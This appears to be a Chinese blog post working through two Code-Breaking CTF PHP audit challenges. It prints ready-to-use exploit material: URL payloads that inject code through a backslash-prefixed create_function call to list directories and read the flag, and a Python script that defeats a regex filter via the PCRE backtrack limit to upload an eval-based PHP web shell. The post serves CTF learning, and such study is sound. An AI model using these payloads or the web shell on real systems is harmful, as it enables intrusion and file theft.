原本看到代碼審計知識星球的內(nèi)容時就很感興趣，準備自己本地復(fù)現(xiàn)的。結(jié)果docker跟docker-compose下好了后郁師傅直接公網(wǎng)上搭好了四道easy難度的審計題目叫我們做hhh。

codebreaking的網(wǎng)站
https://code-breaking.com/
參考閱讀了sky一葉飄零師傅的幾篇博文：
https://skysec.top/2019/03/10/2018-Code-Breaking-1-function/

源碼跟dockerfile可以在github上下，我自己沒有docker知識儲備的情況下也能依葫蘆畫瓢在本地搭好，大家也都可以試試自己做做呀。

function

第一道題目，php代碼審計之function。
先放源碼：

<?php
$action = $_GET['action'] ?? '';
$arg = $_GET['arg'] ?? '';

if(preg_match('/^[a-z0-9_]*$/isD', $action)) {
    show_source(__FILE__);
} else {
    $action('', $arg);
}
?>

老實說第一題確實難到我了,開始前兩行差點以為是代碼出錯了......后來了解到??三元運算符的存在，也就是說：

$action = $_GET['action'] ?? '';

等價于

$action = $_GET['action'] ? $_GET['action'] :'';

改成雙目運算符就好看多了，作用也就和我們原來的isset()差不多，有輸入取輸入，否則為空。

然后就是正則部分了

preg_match('/^[a-z0-9_]*$/isD

其中修飾符

/i不區(qū)分大小寫
/s匹配任何不可見字符，包括空格、制表符、換頁符等等，等價于[ \f\n\r\t\v]
/D 如果使用$限制結(jié)尾字符,則不允許結(jié)尾有換行;

不得不說實在是完備。數(shù)字，字母，下劃線都過濾了，空格換行也沒了，根本不知道有什么能夠匹配的。如果從preg_match()的角度來講，我們熟悉的是%0a開頭，這樣可以使preg_match()得結(jié)果判斷為真。但此處為了達成命令執(zhí)行的目的，必須使preg_match()判斷為假才能到下面的else語句里面。所以，應(yīng)該想著怎么順應(yīng)這個思路走下去。

這時候就得靠想的了?？梢赃x擇用burpsuite去爆破，但是我好像沒有這樣的字典......所以參考sky師傅改的腳本：

import requests

#url='http://139.199.203.253:8087/?action=&arg='
for i in range(1,256):
    tmp = hex(i)[2:]
    if len(tmp) < 2:
        tmp = '0' + hex(i)[2:]
    tmp = '%' + tmp
    url='http://139.199.203.253:8087/?action='+tmp+'var_dump&arg=123'
    r=requests.get(url=url)
    if '123' in r.text:
        print(r.text)
        print(tmp)
        break

FUZZ出來發(fā)現(xiàn)%5c可以直接繞過，而%5c就是\,為什么%5c可以繞過呢？p牛解釋如下：

php里默認命名空間是\，所有原生函數(shù)和類都在這個命名空間中。
普通調(diào)用一個函數(shù)，如果直接寫函數(shù)名function_name()調(diào)用，調(diào)用的時候其實相當于寫了一個相對路徑；
而如果寫\function_name() 這樣調(diào)用函數(shù)，則其實是寫了一個絕對路徑。
如果你在其他namespace里調(diào)用系統(tǒng)類，就必須寫絕對路徑這種寫法

看了后感覺一知半解，于是又看看其他的解釋，大概明白了：

調(diào)用的相當于是全局的函數(shù)

那我們就相當于解決了第一個問題，下面來想想如何解決命令執(zhí)行第二步：$action()應(yīng)當是兩個參數(shù)的函數(shù)。
發(fā)現(xiàn)sky師傅寫的php代碼注入相當全面啊
https://skysec.top/2018/03/09/php-command%20or%20code-injection-summary/
于是知道了create_function這一函數(shù)，稍微了解了其原理：

<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
// outputs
// New anonymous function: lambda_1
// ln(2) + ln(2.718281828459) = 1.6931471805599
?>

相當于

function test($a,$b)
{
    return "ln($a) + ln($b) = " . log($a * $b);
}

那對本題的$action('', $arg),假如令arg=echo ('Hello');}phpinfo();/*相當于

function test($a,$b){
  echo('Hello');
}phpinfo();/*

即可執(zhí)行phpinfo()命令。

system('ls')

同樣的還有exec()等等,實際上后來看源碼里的disablefunction有：

system,shell_exec,passthru,exec,popen,proc_open,pcntl_exec,mail,putenv,apache_setenv,mb_send_mail,dl,set_time_limit,ignore_user_abort,symlink,link,error_log

基本全過濾了嘛......好在通常print_r()與scandir()不會被過濾，昨天剛用過，于是試一下。在本目錄看到index.php,在上級目錄看到flag。
payload：

/?action=%5ccreate_function&arg=return%20%222333%22;}print_r(scandir(%27..%27));/*

/?action=%5ccreate_function&arg=return%20"2333";}print_r(file_get_contents(%27../flag_h0w2execute_arb1trary_c0de%27));/*

flag

pcrewaf

第二道題則是正則回溯攻擊，實際上之前也了接過這種方式，但是一直沒有遇到相關(guān)題目......先看源碼

<?php
function is_php($data){
    return preg_match('/<\?.*[(`;?>].*/is', $data);
}

if(empty($_FILES)) {
    die(show_source(__FILE__));
}

$user_dir = 'data/' . md5($_SERVER['REMOTE_ADDR']);
$data = file_get_contents($_FILES['file']['tmp_name']);
if (is_php($data)) {
    echo "bad request";
} else {
    @mkdir($user_dir, 0755);
    $path = $user_dir . '/' . random_int(0, 10) . '.php';
    move_uploaded_file($_FILES['file']['tmp_name'], $path);

    header("Location: $path", true, 303);
} 1

題目的pcre已經(jīng)告訴我們了重點在于正則上。實際上從源碼可以看出，有一個用于判斷是否是php代碼的函數(shù)。而整體流程允許用戶上傳文件，之后被file_get_contents()讀取,如果文件內(nèi)容有php代碼就失敗。否則創(chuàng)建目錄，并生成保存我們的文件。
既然如此，我們的最終目的當然是通過上傳文件getshell了。而想要getshell,過正則是必須的。因此重心還是放在繞過正則上。
那么這個正則如何通過呢

preg_match('/<\?.*[(`;?>].*/is', $data)

首先就看到它匹配了<,? 這樣的常規(guī)php開頭，那么我們能否使用<%=或者<script language="php">繞過呢？貌似因為php版本號所以不行。那要如何繞過這一正則吃成為了難題。
于是找到p牛本人的文章：
https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html
其中提到NFA（非確定性有限狀態(tài)自動機）的部分就不表了,了解到的正則匹配原來存在回溯問題。對題目已有正則，和測試語句，以及sublime的正則匹配模式（ctrl+h開啟）

<?php phpinfo(); ?>;//aaaaaaaaaa

正則匹配到<?時只需要

<?

而之后

<?.*

也就是說 .*就已經(jīng)把后面的輸入語句全部匹配完了，但是正則還沒有結(jié)束，這時繼續(xù)匹配[(`;?>]時，它就會開始回溯，顯然//aaaaaaaaaa是匹配不上這一表達式中的符號的，那么正則就會一直回溯，直到匹配到；分號才能繼續(xù)下去。
而這居然也可以當做漏洞利用！因為這一回溯的次數(shù)是有限的，所以如果回溯超過上限......preg_match()就會返回false,也就繞過了正則。
（奇淫技巧大概如此吧，真的太神奇了。）

那么利用就很清晰了，我們把//aaa多整點就可以打破回溯上限攻擊。腳本如下(sky師傅的只適用python2吧，我小改了一下）:

import requests
from io import BytesIO

url='http://139.199.203.253:8088/'
payload='<?php eval($_REQUEST[byc]);//'+'a' * 1000000
files = {
  'file':BytesIO(payload.encode('utf-8'))
}

r=requests.post(url=url,files=files,allow_redirects=False)
path=r.headers['Location']
url+=path
data = {
    #'byc':"print_r(scandir('../../../'));"
     'byc':"var_dump(file_get_contents('../../../flag_php7_2_1s_c0rrect'));"
}
r=requests.post(url,data)
print(r.text)

掃到上上上級拿到目錄，之后直接讀取即可

flag

不得不說這些題目技巧性非常強，也很長見識?？此瓶赡艿膚af存在無限的可能。這就是安全人的思考角度吧。
還有兩道明天寫吧,明天就回武漢了hhh